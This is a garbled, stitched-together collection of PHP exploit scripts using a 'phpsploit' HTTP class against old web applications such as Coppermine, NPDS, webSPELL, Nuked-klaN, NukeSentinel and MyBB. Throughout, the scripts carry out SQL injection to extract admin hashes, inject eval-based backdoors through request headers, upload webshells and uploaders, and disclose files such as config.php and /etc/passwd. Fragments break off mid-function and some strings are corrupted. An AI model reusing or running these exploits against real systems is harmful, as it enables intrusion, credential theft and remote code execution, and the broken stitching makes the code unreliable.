function main()
{
// :)
$web = new phpsploit();
$web->agent('Mozilla Firefox');
// Hey ya :)
head();
// Target
$url = get_p('url', true);
// Proxy options
$prh = get_p('proxhost');
$pra = get_p('proxauth');
// Use a proxy ?
if ($prh) {
// host:ip
$web->proxy($prh);
// Authentication
if ($pra) {
$web->proxyauth($pra);
}
}
// Single quote bypass
$byp = "1');";
// PHP code
$php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
// Separator
$s_sep = md5(rand(0, 1000000000) . 'HEY_YA');
$c_sep = "print('{$s_sep}');";
// Final PHP code
$final = $byp . $c_sep . $php . $c_sep . 'exit();//';
// Welcome guess !
while (($cmd = cmd_prompt()) !== false) {
// magic_quotes_gpc bypass
$web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");'));
// Go =]
$web->get($url . 'index.php?fields=' . to_char($final) . ',1');
// Result
$res = explode($s_sep, $web->getcontent());
// Erf
if (!isset($res[1])) {
print "\nFailed";
exit(1);
} else {
if (empty($res[1])) {
print "\nNo output: system() disabled OR cmd failed OR cmd without output";
} else {
print "\n" . $res[1];
}
}
}
return;
}
print "\nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>";
print "\nExample.......: php xpl.php http://c.com/ admin passwd";
print "\n---------------------------------------------------------\n";
exit(1);
}
/*/
[0] => xpl.php [1] => http://localhost/cpg1410/
[2] => root [3] => toor
[4] => localhost:8200 [5] => user:passwd
/*/
$url = $argv[1];
$adu = $argv[2];
$adp = $argv[3];
$pxs = $argv[4];
$pxa = $argv[5];
$xpl = new phpsploit();
$xpl->agent("InternetExploiter");
$xpl->cookiejar(1);
$xpl->allowredirection(1);
print "\nheader> ===============================================";
print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)";
print "\nheader> ===============================================";
if (!empty($pxs)) {
print "\nstatus> Using a proxy {$pxs}";
$xpl->proxy($pxs);
}
if (!empty($pxa)) {
print "\nstatus> Basic proxy authentification {$pxa}";
$xpl->proxyauth($pxa);
}
/*/
#!/usr/bin/php
<?php
if ($argc < 3) {
print "\n --------------------------------------------------------\n Affected.scr..: Simple Web Content Management System\n Poc.ID........: 18070102\n Type..........: SQL Injection\n Risk.level....: Medium\n Src.download..: www.cms-center.com\n Poc.link......: acid-root.new.fr/poc/18070102.txt\n Credits.......: DarkFig\n --------------------------------------------------------\n Usage.........: php xpl.txt <url> <file>\n Options.......: <proxhost:proxport> <proxuser:proxpass>\n Example.......: php xpl.txt http://hihi.org/ /etc/passwd\n --------------------------------------------------------\n";
exit(1);
}
$url = $argv[1];
$file = $argv[2];
$proxh = $argv[3];
$proxa = $argv[4];
$xpl = new phpsploit();
$xpl->agent("Mozilla");
if ($proxh) {
$xpl->proxy($proxh);
}
if ($proxa) {
$xpl->proxyauth($proxa);
}
/*
* $id = $_GET['id'];
* $query = "SELECT * from content WHERE id = $id";
* ...
* @return $row->text;
*
* Simple SQL injection (register_globals=off ; magic_quotes_gpc=on).
* What we want is not in the database, it's in a file (config.php):
*
* //this are the logins for the admin part. Change them for security.
* $login = "******"; //your login for the admin section.
* $pass = "******"; //your login for the admin section.
*
# http://www.thelia.fr/
# THELIA est un logiciel évolutif de Commerce Electronique. THELIA se distingue des applications concurrentes par sa facilité de personnalisation.
# A new version (1.3.6.1) is avaible on www.thelia.fr/fichiers/thelia_1.3.6.1.zip
#
# Black_H :)
#
error_reporting(E_ALL ^ E_NOTICE);
if ($argc < 3) {
echo "\n=___________ Thelia 1.3.5 Multiple Vulnerability Exploit _____________=\n========================================================================\n| Black_H <*****@*****.**> |\n| URL: http://blackh.free.fr - http://blackh.eu |\n========================================================================\n| \$system> {$argv['0']} -url <> -a <1,2,3> -n <> -f <> |\n| Notes: -url ex: http://victim.com/site/ |\n| -a 1 : Validate Command without Payment |\n| -n Commmand number (ex: CDE5627JOC ) |\n| 2 : Remote Code Execution |\n| -n Rubrique id (ex: 1 ) |\n| 3 : Remote File Upload |\n| -n Rubrique id (ex: 1 ) |\n| -f Name of file (ex: leet.php ) |\n| For 2 and 3, the '/client/' directory must not be forbidden |\n========================================================================\n";
exit(1);
}
$url = getparam('url', 1);
$action = getparam('a', 1);
$n = getparam('n', 1);
$f = getparam('f', 0);
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
switch ($action) {
case '1':
valid_command($n);
break;
case '2':
remote_exec($n);
break;
case '3':
remote_upload($n, $f);
break;
default:
die('Please choose an action.');
break;
}
#!/usr/bin/php
<?php
error_reporting(E_ALL ^ E_NOTICE);
head();
if ($argc < 3) {
usage();
}
$url = getparam('url', true);
$prx = getparam('proxy', false);
$pra = getparam('proxyauth', false);
$cod = 'eval($_SERVER[HTTP_SHELL]);';
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(1);
$xpl->cookiejar(1);
if ($prx) {
$xpl->proxy($prx);
}
if ($pra) {
$xpl->proxyauth($pra);
}
print "0x01>Deleting the file auth.inc.php";
$xpl->post($url . 'dirsys/modules/auth.php', 'suppr=1');
print "\n0x02>Creating the file auth.inc.php";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
print "\n0x03>Trying to log in as Administrator";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
// Minimum data necessary (fwrite without quote)
$minimdata = 'WIDTH_TREE_FRAME=1&FRAME_BORDER=1&WIDTH_FRAME_BORDER=1&WIDTH_FRAME_SP' . 'ACING=1&SCROLING_TREE_FRAME=1&RESIZE_FRAME=1&WIDTH_TD_SIZE=1&WIDTH_TD' . '_TYPE=1&WIDTH_TD_DATE=1&STYLE=1&TOTALSIZE=1&CHECK_MAJ=1&IMAGE_BROWSER' . '=1&IMAGE_TN=1&GD2=1&IMAGE_JPG=1&IMAGE_GIF=1&IMAGE_BMP=1&IMAGE_TN_SIZE' . '=1&IMAGE_TN_COMPRESSION=1&NB_COLL_TN=1&EXIF_READER=1&SLIDE_SHOW=1&DEB' . 'UG=0;' . urlencode($cod) . '//&SLIDE_SHOW_INT=1&BACK=1&WRITE_TN=1&AUTO_RE' . 'SIZE=1&DETAILS=1&DIRINFO_LIFE=1&activer_Message=1';
print "\n0x04>Creating the file config.inc.php";
$xpl->post($url . 'dirsys/modules/config/post.php', $minimdata);
--------------------------
|
+-> Remote File Inclusion (admin rights needed in order to insert "top_url" in "atk_forums")
---[ CODE ./index/common_actions.php
------------------------------------
$file = $_FILES['upload']['tmp_name']; ...
if(@copy($file,$path_file)) $avatar=$path_file;
------------------------------------
|
+-> $_FILES can be overwritten (with extract()), this can lead to file disclosure =).
*/
$url = $argv[1];
$prs = $argv[2];
$pra = $argv[3];
$xpl = new phpsploit();
if (!empty($prs)) {
$xpl->proxy($prs);
}
if (!empty($pra)) {
$xpl->proxyauth($pra);
}
print "\nheader> Aztek Forum 4.1 Multiple Vulnerabilities Exploit";
print "\nheader> ==================================================";
if (preg_match("#href='\\./index\\.php\\?owner=(\\S*)'#i", $xpl->getcontent($xpl->get($url . 'forum.php?fid=-1%20or%201=1')), $matches)) {
print "\nsploit> Owner -> " . $matches[1];
} else {
die("\nsploit> Exploit failed");
}
$owner = $matches[1];
print "\nstatus> Trying to register a new user";
#!/usr/bin/php
<?php
error_reporting(E_ALL ^ E_NOTICE);
# Advisory soon
if ($argc < 3) {
print "\n TITLE | Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day\n AUTHOR | DarkFig \\/ http://www.acid-root.new.fr \\/ gmdarkfig@gmail.com\n NOTE | Works regardless of php settings\n USAGE | {$argv['0']} -url <url> [Options]\nOPTIONS | -proxy If you wanna use a proxy <proxyhost:proxyport> \n | -proxyauth Basic authentification <proxyuser:proxypwd>\n";
exit(1);
}
$url = getparam('url', 1);
$pro = getparam('proxy');
$pra = getparam('proyauth');
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
if ($pro) {
$xpl->proxy($pro);
}
if ($pra) {
$xpl->proxyauth($pra);
}
# +print.php (SQL INJECTION)
# |
# 124. } elseif (!empty($lid)) {
# 125. settype ($lid, "integer");
# 126. PrintPage("links",$DB, $lid);
#
# 30. if ($oper=="links") {
# 31. $result=mysql_query("select url, title, description, date from ".$DB."links_links where lid='$sid'");
# 32. list($url, $title, $description, $time)=mysql_fetch_row($result);
# 40. if ($DB) {
# 41. $remp=meta_lang(aff_code(aff_langue(ob_get_contents())));
#
<?php
//webSPELL SQL-injection exploit in gallery.php
$xpl = new phpsploit();
$xpl->allowredirection(1);
$xpl->cookiejar(1);
function istrue($xpl, $host, $path, $prefix, $gid, $pid, $uid, $i, $h)
{
$xpl->get("http://" . $host . $path . "gallery.php?action=window&galleryID=" . $gid . "&picID=" . $pid . "%20AND%20MID((SELECT%20password%20FROM%20" . $prefix . "user%20WHERE%20userID=" . $uid . ")," . $i . ",1)=CHAR(" . $h . ")");
$response = $xpl->getcontent();
$regex = '/<html><head><title>webSPELL Diashow: (.+?)<\\/title>/';
if (preg_match($regex, $response)) {
return true;
} else {
return false;
}
}
if ($_SERVER['argc'] == 7 or $_SERVER['argc'] == 8) {
$host = $_SERVER['argv'][1];
$path = $_SERVER['argv'][2];
$prefix = $_SERVER['argv'][3];
$gid = $_SERVER['argv'][4];
$pid = $_SERVER['argv'][5];
$uid = $_SERVER['argv'][6];
if ($_SERVER['argc'] == 8) {
$proxy = $_SERVER['argv'][7];
echo "Proxy: {$proxy} \n";
$xpl->proxy($proxy);
}
$xpl->agent('Internet Explorer');
echo "exploiting...\n";
* Special thanks to: ddx39.
*
\*---------------------------------------------------------------*/
$md5loc = array(array('http://www.milw0rm.com/cracker/search.php', 'hash=', '<TD align="middle" nowrap="nowrap" width=90>([^<]+)</TD><TD align="middle" nowrap="nowrap" width=90>cracked</TD></TR>'), array('http://gdataonline.com/qkhash.php?mode=txt&hash=', '', '</td><td width="35%"><b>([^<]+)</b></td></tr>'), array('http://pepowned.free.fr/?act=&x=52&y=16&md5=', '', 'Le Plain Text de <b>\\w{32}</b> est : <b>([^<]+)</b>'), array('http://passcracking.ru/index.php', 'admin=false&admin2=77.php&datafromuser='******'<td>\\w{32}</td><td bgcolor=\\#FF0000>([^<]+)</td><td>'), array('http://md5.rednoize.com/?p&s=md5&_=&q=', '', '<div id="result">([^<]+)</div>'), array('http://ice.breaker.free.fr/md5.php?hash=', '', '<b><br><br> - ([^<]+)<br><br><br><a href=http://ice\\.breaker\\.free\\.fr/'));
print "\n";
print " PEEL CMS Admin Hash Extraction and Remote Upload\n";
print " by Charles \"real\" F. <charlesfol[at]hotmail.fr>\n\n";
if ($argc < 2) {
print "usage: php peel_exploit.php <url> [options]\n\n";
print "Options:\n";
print " -admin <login:pass>\tIf you have admin access, you can use this.\n";
print "\nexample: php peel_exploit.php http://site.org/boutique/ -admin admin:passw0rd\n";
exit;
}
$url = $argv[1];
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
$admin = getparam("admin");
if ($admin) {
print "[*] Using admin login {$admin}\n";
list($login, $r) = explode(":", $admin);
attack($login, $r);
print "\n";
} else {
/* --- ATTACK #1: LOGIN GUESSING --- */
print "[*] Attack #1\n";
$default = array(array("*****@*****.**", "admin"), array("*****@*****.**", "cinema"));
for ($i = 0; $i < sizeof($default); $i++) {
print "[*] Trying with " . $default[$i][0] . ":" . $default[$i][1];
if (attack($default[$i][0], $default[$i][1]) == 1) {
exit;
print "\nType..........: PHP Code Execution";
print "\nRisk.level....: High";
print "\nSrc.download..: www.alexphpteam.com";
print "\nPoc.link......: acid-root.new.fr/poc/20070107.txt";
print "\nCredits.......: DarkFig";
print "\n---------------------------------------------------------";
print "\nUsage.........: php xpl.php <url>";
print "\nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>";
print "\nExample.......: php xpl.php http://victim.com/@lexgb/";
print "\n---------------------------------------------------------\n";
exit(1);
}
$url = $argv[1];
$prs = $argv[2];
$pra = $argv[3];
$xpl = new phpsploit();
$xpl->agent("Sploitzilla");
if (!empty($prs)) {
$xpl->proxy($prs);
}
if (!empty($pra)) {
$xpl->proxyauth($pra);
}
/*/
|
| index.php
| =========
| ... include($chem_absolu."include/livre_include.".$alex_livre_ext);
|
|
| livre_include.php -> Local File Inclusion
print " -file If you wanna upload a specific file\n";
print " else it will upload a simple uploader.\n";
print "\n";
print " eg: ./nk_exploit.php -url http://localhost/nk/ -admin real:passw0rd\n";
print " eg: ./nk_exploit.php -url http://localhost/nk/ -file cshell.php -proxy localhost:8118\n\n";
die;
}
$url = getparam("url", 1);
$mode = getparam("mode") ? getparam("mode") : 0;
$adm = getparam("admin");
$acc = getparam("user");
$prx = getparam("proxy");
$prefix = getparam("prefix") ? getparam("prefix") : "nuked_";
$file_upload_code = getparam("file") ? file_get_contents(getparam("file")) : '<?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"></center></form>';
$date = array(date('Y'), date('m'), date('d'));
$xpl = new phpsploit();
if ($prx) {
$xpl->proxy($prx);
}
/* Admin account defined */
if ($adm) {
print "[*] Using admin account {$adm}\n";
list($login, $passwd) = explode(":", $adm);
$xpl->addheader("Referer", $url);
$c = $xpl->post($url . "index.php?file=User&{$prefix}nude=index&op=login", "pseudo={$login}&pass={$passwd}&remember_me=ok");
if (preg_match("#{$prefix}sess_id=([a-z0-9]+)#i", $c, $sid) && preg_match("#uid=([a-z0-9]+)#i", $c, $uid)) {
$admin_sid = $sid[1];
$admin_uid = $uid[1];
print " SID -> {$admin_sid}\n";
print " UID -> {$admin_uid}\n";
finalattack($admin_sid, $admin_uid);
<?php
/*
Title: Jupiter CMS 1.1.5 SQL Injection Vulnerability
Advisory ID: 12070214
Risk level: High
Author: DarkFig <*****@*****.**>
URL: http://www.acid-root.new.fr/advisories/12070214.txt
*/
error_reporting(E_ALL ^ E_NOTICE);
$url = 'http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$hev = "-1' UNION SELECT CONCAT('" . "[BEGIN_XPL_USER]'," . "(SELECT username FROM users LIMIT 0,1),'" . "[END_XPL_USER]','" . "[BEGIN_XPL_PWD]'," . "(SELECT password FROM users LIMIT 0,1),'" . "[END_XPL_PWD]'),1 #";
$xpl->addheader("Client-IP", $hev);
$xpl->get($url);
preg_match("#\\[BEGIN_XPL_USER\\](.*)\\[END_XPL_USER\\]#", $xpl->getcontent(), $usr);
preg_match("#\\[BEGIN_XPL_PWD\\]([a-z0-9]{32})\\[END_XPL_PWD\\]#", $xpl->getcontent(), $pwd);
print $usr[1] . '::' . $pwd[1];
/*
*
* Copyright (C) darkfig
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* @example $this->reset()
*
*/
function reset($func = '')
{
switch ($func) {
case 'header':
$this->header = array();
break;
case 'cookie':
$this->cookie = array();
break;
default:
$this->cookiejar = '';
$this->header = array();
$this->cookie = array();
$this->allowredirection = '';
break;
}
}
}
$web = new phpsploit();
$web->cookiejar(1);
$web->agent('Mozilla Firefox');
$ipb = new ipb_spl();
$ipb->web =& $web;
$ipb->main();
?>
# milw0rm.com [2008-08-29]
<?php
#
# Nuked-klaN 1.7.6 Remote Code Execution Exploit
# ------------------------------------------------
# Author: DarkFig <*****@*****.**>
# Website: http://www.acid-root.new.fr/
# PHP conditions: None =]
# Private since 2 months.
#
error_reporting(E_ALL ^ E_NOTICE);
# This file require the PhpSploit class.
$xpl = new phpsploit();
$url = 'http://localhost/nk/';
# url
$prx = '';
# proxy <proxyip>:<proxyport>
$pra = '';
# basic authentification <proxyuser:proxypwd>
$xpl->agent("Firefox");
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if ($prx) {
$xpl->proxy($prx);
}
if ($pra) {
$xpl->proxyauth($pra);
}
$config = array();
$config[] = 'nuked';
# table prefix
# Logged in (ws_auth=1%3A7b24afc8bc80e548d66c4e7ff72171c5)
# Trying to upload the malicious file
# Done (http://localhost/webspell4.01.02/downloads/c99shell.php)
#
if ($argc < 5) {
print "\n------ webSPELL <= 4.01.02 Remote PHP Code Execution Exploit ------\n-----------------------------------------------------------------------\nPHP conditions: register_globals=On\n Credits: DarkFig <*****@*****.**>\n URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n Usage: {$argv['0']} -url <> -file <> [Options]\n Params: -url For example http://victim.com/webspell/ \n -file The file you wanna upload (c99shell.php...)\nOptions: -prefix Table prefix (default=webs)\n -upmatch The match which returns TRUE for the upload\n -sqlmatch The match which returns TRUE for the SQL injection\n -proxy If you wanna use a proxy <proxyhost:proxyport> \n -proxyauth Basic authentification <proxyuser:proxypwd>\nExample: {$argv['0']} -url http://localhost/webspell/ -file c99shell.php\n-----------------------------------------------------------------------\n";
exit(1);
}
$url = getparam('url', 1);
$file = getparam('file', 1);
$prfix = getparam('prefix') != '' ? getparam('prefix') : 'webs';
$match_upload = getparam('upmatch') != '' ? getparam('upmatch') : '\\;URL\\=index\\.php\\?site\\=files\\&file\\=';
$match_blindsql = getparam('sqlmatch') != '' ? getparam('sqlmatch') : 'site\\=profile\\&id\\=';
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if ($proxy) {
$xpl->proxy($proxy);
}
if ($authp) {
$xpl->proxyauth($authp);
}
print "\nAdmin id: ";
$userid = blind('userID');
print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));
print "\nLogged in (ws_auth={$userid}%3A{$passwd})";
$xpl->addcookie("ws_auth", $userid . "%3A" . $passwd);
# File upload vulnerability
#
*
*/
print "\n";
print " phpTournois <= G4 Remote File Upload/Code Execution Exploit\n";
print " by Charles \"real\" F. <charlesfol[at]hotmail.fr>\n\n";
if ($argc < 3) {
print "usage: php phptn_exploit.php -url <url> [options]\n\n";
print " Options: -mode 0 -> Remote Upload (default)\n";
print " 1 -> Remote Code Execution\n";
print " -proxy If you want to use a proxy.\n";
exit;
}
$url = getparam("url", 1);
$mode = getparam("mode") ? getparam("mode") : 0;
$prx = getparam("proxy");
$xpl = new phpsploit();
if ($prx) {
$xpl->proxy($prx);
}
$xpl->addcookie("grade[a]", "a");
/* Code in the fake avatar */
if ($mode == 0) {
$file_upload_code = '<?php if(isset($_POST[\'d\'])) unlink(__FILE__); ?><?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"><input type="submit" name="d" value="x"></center></form><br><form method="get"></form>';
$c0de = '<?php' . "\n" . 'error_reporting(0);' . "if(isset(\$_SERVER['HTTP_UPLOAD'])) { \$f=fopen('w00t.php','w');fputs(\$f,'" . preg_replace("#'#i", "\\'", $file_upload_code) . "');print 'upfiledone'; }\n" . 'include("include/files/accueil.php"); ?>';
} else {
$c0de = '<?php' . "\n" . 'error_reporting(0);' . 'if(isset($_SERVER[HTTP_SHELL]))' . '{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' . 'include("include/files/accueil.php"); ?>';
}
/* Upload avatar with PHP c0de */
print " * uploading avatar\t";
$avatar = array(frmdt_url => $url . '?page=avatars&op=modify', 'avatar' => array(frmdt_filename => '1.gif', frmdt_type => 'image/gif', frmdt_content => $c0de), 'id' => 1, 'mode' => 'J', 'avatarurl' => '', 'avatarremoteurl' => '', 'MAX_FILE_SIZE' => 999999);
if (preg_match("#location.href='\\?page=avatars&id=\\d+&mode=J'#i", $xpl->formdata($avatar))) {
#!/usr/bin/php
<?php
error_reporting(E_ALL ^ E_NOTICE);
if ($argc < 3) {
print "\n-- NukeSentinel <= 2.5.06 SQL Injection (mysql >= 4.0.24) Exploit ---\n-----------------------------------------------------------------------\nPHP conditions: none\nCMS conditions: disable_switch<=0 (module activated), track_active=1\n Credits: DarkFig <*****@*****.**>\n URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n Usage: {$argv['0']} -url <> [Options]\n Params: -url For example http://victim.com/phpnuke/ \nOptions: -prefix Table prefix (default=nuke)\n -debug Debug mod activated (debug_ns.html)\n -truetime Server response time which returns true\n -benchmark You can change the value used in benchmark()\n -proxy If you wanna use a proxy <proxyhost:proxyport> \n -proxyauth Basic authentification <proxyuser:proxypwd>\nExample: {$argv['0']} -url http://localhost/phpnuke/ -debug\n Note: This exploit is based on the server response time\n If you have some problems use -debug, -benchmark, -truetime\n-----------------------------------------------------------------------\n";
exit(1);
}
$url = getparam("url", 1);
$tblprfix = getparam("prefix") != "" ? getparam("prefix") : 'nuke';
$debug = getparam("debug") != "" ? 1 : 0;
$benchmark = getparam("benchmark") != "" ? getparam("benchmark") : '100000000';
$proxy = getparam("proxy");
$proxyauth = getparam("proxyauth");
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if ($proxy) {
$xpl->proxy($proxy);
}
if ($proxyauth) {
$xpl->proxyauth($proxyauth);
}
if ($debug) {
debug(1);
}
print "\nUsername: "******"\nPassword: ";
bruteforce('pwd');
exit(0);
#
if ($argc < 5) {
print "\n NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit\n------------------------------------------------------------------\nPHP conditions: none\nCMS conditions: disable_switch<=0 (module activated), track_active=1\n Credits: DarkFig <*****@*****.**>\n URL: http://www.acid-root.new.fr/\n------------------------------------------------------------------\n Usage: {$argv['0']} -url <url> -victim <username> [Opts]\nOptions: -isadmin Is the victim an Admin (1) or a normal user (default=0) ?\n -prefix Table prefix (default=nuke)\n -tid If you have already used this sploit\n -bf You can precise how many hits we can try\n -proxy If you wanna use a proxy <proxyhost:proxyport> \n -proxyauth Basic authentification <proxyuser:proxypwd> \n------------------------------------------------------------------\n";
exit(1);
}
$url = getparam('url', 1);
# http://localhost/php-nuke-7.9/html/
$login = getparam('victim', 1);
# Default # Victim (root for example)
$admin = getparam('isadmin') != '' ? getparam('isadmin') : 0;
$prfix = getparam('prefix') != '' ? getparam('prefix') : 'nuke';
$tid = getparam('tid') != '' ? getparam('tid') : 0;
$nbtst = getparam('bf') != '' ? getparam('bf') : 10000;
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if ($proxy) {
$xpl->proxy($proxy);
}
if ($authp) {
$xpl->proxyauth($authp);
}
# +nukesentinel.php
# 49. if($ab_config['disable_switch'] > 0) { return; }
# 414. if($ab_config['track_active'] == 1 AND !is_excluded($nsnst_const['remote_ip'])) {
# 458. $db->sql_query("INSERT INTO `".$prefix."_nsnst_tracked_ips` (`user_id`, `username`, `date`, `ip_addr`, `ip_long`, `page`,
# `user_agent`, `refered_from`, `x_forward_for`, `client_ip`, `remote_addr`, `remote_port`, `request_method`,
# `c2c`) VALUES ('".$nsnst_const['ban_user_id']."', '$ban_username2', '".$nsnst_const['ban_time']."',
# '".$nsnst_const['remote_ip']."', '".$nsnst_const['remote_long']."', '$pg', '$user_agent', '$refered_from',
# '".$nsnst_const['forward_ip']."', '".$nsnst_const['client_ip']."', '".$nsnst_const['remote_addr']."',
<?php
/*
Title: Jupiter CMS 1.1.5 File Upload Vulnerability
Advisory ID: 12070214
Risk level: High
Author: DarkFig <*****@*****.**>
URL: http://www.acid-root.new.fr/advisories/12070214.txt
*/
error_reporting(E_ALL ^ E_NOTICE);
$url = ' http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$arr = array(frmdt_url => $url . 'modules/emoticons.php', "a" => 1, "req_file" => array(frmdt_filename => "iamaphpfile.php", frmdt_type => "image/jpeg", frmdt_content => "<?php echo(iamontheserver); ?>"));
$xpl->formdata($arr);
$xpl->get($url . 'images/emoticons/iamaphpfile.php');
print $xpl->getcontent();
/*
*
* Copyright (C) darkfig
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
# They don't corrected the function (this is a choice ... the bad) and they forgot to correct 1 (only) SQL request.
# They must correct the problem at the source =)
#
if ($argc < 3) {
print "\n--- MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit ---\n-----------------------------------------------------------------------\nPHP conditions: none\n Credits: DarkFig <*****@*****.**>\n URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n Usage: {$argv['0']} -url http://victim.com/ [Options]\n Params: -url For example http://victim.com/myBB/\nOptions: -debug Debug mod activated (debug_mybb.html)\n -truetime Server response time which returns true\n -benchmark You can change the value used in benchmark()\n -proxy If you wanna use a proxy <proxyhost:proxyport> \n -proxyauth Basic authentification <proxyuser:proxypwd>\n Note: If you have some problems use -debug, -benchmark, -truetime\n-----------------------------------------------------------------------\n";
exit(1);
}
$url = getparam('url', 1);
$debug = getparam('debug') != '' ? 1 : 0;
$benchmark = getparam('benchmark') != '' ? getparam('benchmark') : '1000000';
$proxy = getparam($proxy);
$proxyauth = getparam($proxyauth);
$backdoor = 'uploads/avatars/backdoor.php';
# inc/cache/backdoor.php
$filetoed = 'index.lang.php';
$xpl = new phpsploit();
$xpl->agent('Firefox');
if ($proxy) {
$xpl->proxy($proxy);
}
if ($proxyauth) {
$xpl->proxyauth($proxyauth);
}
if ($debug) {
debug(1);
}
# There is two solutions to be logged in as administrator.
#
# SOLUTION NUMBER 1
# mysql> select * from mybb_users\G
# *************************** 1. row ***************************
exit("\n-{$param} parameter required");
} else {
return;
}
}
$url = getparam("url", 1);
$login = getparam("login", 1);
$pass = getparam("pass", 1);
$email = getparam("email", 1);
$file = getparam("file", 1);
$id = getparam("id");
$source = @file_get_contents($file);
if (strlen($source) < 2) {
exit("{$file} don't exist.\n");
}
$xpl = new phpsploit();
$s = $xpl->post($url . "/index.php?", "sql_pseudo={$login}&sql_pass={$pass}");
//Cookies
if (preg_match("#Set-Cookie: PHPSESSID=([a-z0-9]+)#i", $s, $phpsessid) && !preg_match("#name=\"sql_pseudo\"#i", $s)) {
$xpl->addcookie("PHPSESSID", $phpsessid[1]);
$xpl->addcookie("sql_pseudo", $login);
$xpl->addcookie("sql_pass", md5($pass));
$xpl->addcookie("auto", "off");
print "[*] PHPSESSID : {$phpsessid['1']}\n";
} else {
exit("[*] Can't log in\n");
}
//Id
if (!isset($id)) {
preg_match("#id=([0-9]+)\" title=\"Voir son profil\">" . $login . "<\\/a>#i", $s, $id_member);
$id = $id_member[1];
#
# SQL Injection --> File Disclosure
# Maybe work on other versions.
# Interesting exploit =)
#
if ($argc < 5) {
print "\n NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit\n------------------------------------------------------------------\nPHP conditions: none\nCMS conditions: disable_switch<=0 (module activated)\n Credits: DarkFig <*****@*****.**>\n URL: http://www.acid-root.new.fr/\n------------------------------------------------------------------\n Usage: {$argv['0']} -url <url> -file <file> [Options]\nExample: {$argv['0']} -url http://www.victim.com/ -file config.php\nOptions: -proxy If you wanna use a proxy <proxyhost:proxyport> \n -proxyauth Basic authentification <proxyuser:proxypwd> \n------------------------------------------------------------------\n";
exit(1);
}
$url = getparam('url', 1);
# http://localhost/php-nuke-7.9/html/
$file = getparam('file', 1);
# config.php, admin/.htaccess
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if ($proxy) {
$xpl->proxy($proxy);
}
if ($authp) {
$xpl->proxyauth($authp);
}
# +nukesentinel.php
#
# 52. $nsnst_const['server_ip'] = get_server_ip();
# 53. $nsnst_const['client_ip'] = get_client_ip();
# 54. $nsnst_const['forward_ip'] = get_x_forwarded();
# 55. $nsnst_const['remote_addr'] = get_remote_addr();
# 56. $nsnst_const['remote_ip'] = get_ip(); // If $nsnst_const['client_ip'] return it, elseif $nsnst_const['forward_ip'] return it ...
#
